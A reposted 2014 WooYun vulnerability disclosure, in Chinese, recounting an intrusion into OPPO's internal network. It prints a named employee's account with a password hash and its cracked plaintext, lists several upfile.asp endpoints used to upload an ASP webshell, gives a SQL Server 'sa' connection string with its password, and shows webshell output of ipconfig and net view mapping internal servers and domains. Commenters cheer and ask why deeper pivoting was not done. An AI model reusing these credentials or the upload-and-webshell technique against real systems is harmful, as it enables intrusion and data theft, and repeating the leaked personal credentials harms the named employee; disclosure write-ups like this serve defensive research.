oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

admin 2015年6月9日11:31:45评论324 views字数 268阅读0分53秒阅读模式
摘要

2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-06: 厂商已经确认,细节仅向厂商公开
2014-09-16: 细节向核心白帽子及相关领域专家公开
2014-09-26: 细节向普通白帽子公开
2014-10-06: 细节向实习白帽子公开
2014-10-20: 细节向公众公开

漏洞概要 关注数(22) 关注此漏洞

缺陷编号: WooYun-2014-75207

漏洞标题: oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

相关厂商: 广东欧珀移动通讯有限公司

漏洞作者: Summer

提交时间: 2014-09-05 21:15

公开时间: 2014-10-20 21:16

漏洞类型: 成功的入侵事件

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: webshell 安全意识不足 webshell 安全意识不足 webshell

2人收藏


漏洞详情

披露状态:

2014-09-05: 细节已通知厂商并且等待厂商处理中
2014-09-06: 厂商已经确认,细节仅向厂商公开
2014-09-16: 细节向核心白帽子及相关领域专家公开
2014-09-26: 细节向普通白帽子公开
2014-10-06: 细节向实习白帽子公开
2014-10-20: 细节向公众公开

简要描述:

不给乌云的小云闪电标志,绝不罢休!哼!

详细说明:

首先,我是如何是外网杀入内网。

http://fuwu.oppo.com:8899/ oppo客服服务交流中心

http://fuwu.oppo.com:8899/sysadmin/index.asp

这有个oppo售后服务交流中心的后台,但是我Fuzzing了,无果,尝试了弱口令,无果。

通过扫描,发现了一个很普通的搜索页面,但是里面,却不是搜索,而是一份内部员工的帐号密码信息泄漏。

http://fuwu.oppo.com:8899/sysadmin/search.asp

oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

通过对密码的解密,去尝试登录上面的后台,发现登录不进去。收集到了内部员工的帐号密码,那么就尽可能的多找些登录页面。

http://fuwu.oppo.com:8899/

既然没有注册选项,那么我就去尝试登录这个,我们就用“张潇华”这个用户去登录吧。

帐号:张潇华 密码:e9108e9d5502834d(解密后:xxhzhang)

oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

成功登录进去了···

oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

既然进到了后台,那么就得想办法拿webshell了,这里的拿webshell我就简单说下,因为这个上传的地方,我之前就发现了很多,之前的上传点都没有猜出来目录,所以开始分析这个目录的规律,才明白这个上传点。

#############通杀上传漏洞#############

通过之前很多上传点猜目录的失败,这次我先来确定目录结构是怎么的。

oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

发现目录结构是这样的:http://fuwu.oppo.com:8899/files/policy/268931035.doc

然后开始上传吧,之前是这样的,我在其他站点发现这样的上传点,但是上传成功上传一句话后,找不到路径,构造了很多,是没有成功。

oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

在这里我们可以看到,虽然alert只能上传exe,rar,psd,txt,ppt等等,但是还是成功上传,只需要我们按照那个附件的路径写对就OK了。

code 区域
alert('Upload success!');window.opener.document.getElementById('fujian').value='463264491.asp';window.close();

oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

涉及此上传漏洞的地址如下:

code 区域
http://www.hebeioppo.com/bbs/upfile.asp
http://market.oppo.com:888/bbs/upfile.asp
http://market.oppo.com:888/download/upfile.asp
http://fuwu.oppo.com:8899/bbs/upfile.asp

还有很多...我就不一一列出了...只要按照我上面的目录,构造对应的目录,就可以拿到,其实不通过后台,我们也可以拿到,因为后台也是同样的上传点,只不过目录没有猜对。

漏洞证明:

code 区域
Domain Path
:801: c:/inetpub/wwwroot
:8010: D:/移动办公(OMO)
172.16.101.211:8010:omo.oppo.com
172.16.101.211:80:www.winbase.com.cn D:/web site/winbase
172.16.101.211:808:service.oppo.com D:/SHOUHOU
:80:www.ibbkehome.com D:/web site/ibbkehome
:8008:pop.myoppo.com D:/web site/Pop
:80:dl.oppo.com D:/web site/dl.oppo.com
:80:www.myoppo.com D:/web site/tgw
:80:myoppo.com
:80:market1.bbkav.com D:/web site/bbkav-1
:80:service.oppo.com D:/crm
172.16.101.211:8088:service.oppo.com D:/OPPOCSSW
172.16.101.211:8088:
172.16.101.211:8090: D:/印尼Service
172.16.101.211:8091: D:/VietnService
:80: D:/web site/wanyol
:8023: D:/web site/ioppocn
172.16.101.211:8899:fuwu.oppo.com D:/web site/sales
:80:market.bbkav.com D:/web site/bbkav
:80:fuwu.bbkehome.com D:/web site/bbkehome
:8128: D:/BrandUnReceiveMail
:8018:sc.myoppo.com D:/web site/sc
:80:www.bbkyw.com.cn D:/web site/business
:80:www.hebeioppo.com D:/web site/hebeioppo
:8088:service.bbkehome.com D:/BBKWCSS
:80:market.bbkehome.com D:/web site/ehome
:888:market.oppo.com D:/web site/oppo market
:8091: D:/web site/testsales
172.16.101.211:8011: D:/web site/xhh
:80:plm.oppo.com D:/KPI/plm
:80:jl.myoas.com D:/OPPO Sales

数据库多到我都数不清,我就不一一列举了。而且很多都是sa的权限的。

code 区域
server=172.16.100.236,1999;UID=sa;PWD=bbkav_9988;database=master;Provider=SQLOLEDB

oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

oppo手机内网大豪游(涉及大批站点沦陷,大批数据库泄漏,多站点通杀上传漏洞等)

code 区域
D:/web site/sales/files/policy/> ipconfig /all


Windows IP Configuration



Host Name . . . . . . . . . . . . : P13

Primary Dns Suffix . . . . . . . :

Node Type . . . . . . . . . . . . : Unknown

IP Routing Enabled. . . . . . . . : No

WINS Proxy Enabled. . . . . . . . : No



Ethernet adapter Local Area Connection:



Connection-specific DNS Suffix . :

Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection

Physical Address. . . . . . . . . : 00-50-56-A3-3D-24

DHCP Enabled. . . . . . . . . . . : No

IP Address. . . . . . . . . . . . : 172.16.101.211

Subnet Mask . . . . . . . . . . . : 255.255.252.0

Default Gateway . . . . . . . . . : 172.16.103.1

DNS Servers . . . . . . . . . . . : 172.16.101.221
code 区域
D:/web site/sales/files/policy/> net view
Server Name Remark

-------------------------------------------------------------------------------
//AUTOTASK
//AUTOTASK27
//AUTOTASK28
//BBKAV-C1
//BIEE-TEST
//BIEETEST BieeTEST
//BS01
//BS02
//CONSUMPTION-DB
//DG-RONGZAI
//DS
//ESA-AP
//ESA-KF
//EXAM_WIN2008
//FTP_EX
//HR-PS
//HWSH01
//ILEARNING01
//ILEARNING1
//IMEI
//IMEI01
//IOTEST-CA
//JK-ALLSERVER
//KAOQIN
//KAOQIN01
//KQ-CA
//KQ02-CA
//MAIL
//MAS2000-5
//MES-A
//MES-A-SERVER MES-A
//MOTHERBOARD-CA
//OA-A oa-a
//OA-C
//OA-D
//OATEST
//OME-CA
//OPPO-4376AC34CD
//OPPO-RDM
//P0485076
//P1
//P10901145A
//P11
//P13
//P20
//P21
//P4
//P5
//P6
//P80076129
//PATENTM-SERVER
//PDM1
//PDM3
//PEIXUN
//PLM-A
//PLM-DEV
//PLMINSTALLDEMO
//POP
//PRINT-CA
//PV1
//RONGZAI-SH
//RTX-CA
//SMARTL
//TEST-DB
//TL
//UBUNTU ubuntu server (Samba, Ubuntu)
//UBUNTU-SVN-CA ubuntu-svn-ca server (Samba, Ubuntu)
//UBUNTU5 ubuntu5 server (Samba, Ubuntu)
//V6-OA-1
//WIN-2SHKLIMARPS
//WIN-RTC-DEV
//WIN2003_X32
//WIN2003R2_BA06
//WIN2003R2_X64_T
//WIN2003R2X64ZMD win2003r2x64zmd
//WIN2008_ZMD_NEW
//WIN2008BI
//WINDOWS-2008R2-
//WMS-TEST-SGH WMS-TEST-SGH
//WXFILE1-SERVER WXfile1-server server (Samba, Ubuntu)
//XZ-DG
//YDSH
//YN-DBSTANDBY YN-DBStandby
//YNSH_DBSTANDBY YNSH_DBStandby
//淇濆畨棰嗙彮
//鐢熸椿鍖轰繚瀹夊
//鐢熸椿鍖烘秷闃插憳
code 区域
D:/web site/sales/files/policy/> net view /domain
Domain

-------------------------------------------------------------------------------
ADC
ADC3
BBKAV
EXCHANGE03
WORKGROUP
淇℃伅绠$悊閮?
璁惧鍚庡嫟閮?

这个有多大...就不用我说了吧...

修复方案:

1.清理webshell

2.修复上传漏洞

3.避免敏感信息泄漏

版权声明:转载请注明来源 Summer@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-09-06 15:54

厂商回复:

内部服务系统,IT已在全力修复中

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分


评价

  1. 2014-09-05 22:46 | 胖子 ( 普通白帽子 | Rank:103 漏洞数:26 | 加大你的带宽!加大你的内存!加大你的显示器...)

    1

    你这么屌家里人知道吗?

  2. 2014-09-06 09:09 | Jack.Chalres ( 实习白帽子 | Rank:39 漏洞数:15 | ..............)

    1

    So diao

  3. 2014-09-06 11:25 | M4sk ( 普通白帽子 | Rank:1218 漏洞数:323 | 啥都不会....)

    0

    坤坤最近经常日站啊

  4. 2014-09-06 17:21 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号,不装逼了,再见孩子们。by Mosua...)

    1

    我草,我的oppo啊

  5. 2014-09-26 22:23 | mango ( 核心白帽子 | Rank:2165 漏洞数:312 | 解决问题的第一步,是要承认问题的存在。)

    1

    为何不内网渗透??

  6. 2014-09-26 22:30 | 卡卡 ( 普通白帽子 | Rank:468 漏洞数:57 | <script>alert('安全团队长期招人')</scrip...)

    0

    怎么不渗透内网,说好的漫游呢~

  7. 2014-10-21 08:29 | ieasyi ( 路人 | Rank:3 漏洞数:2 )

    1

    怎么不渗透内网,说好的漫游呢~ 难道漫游费太高?and 中国移动?

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin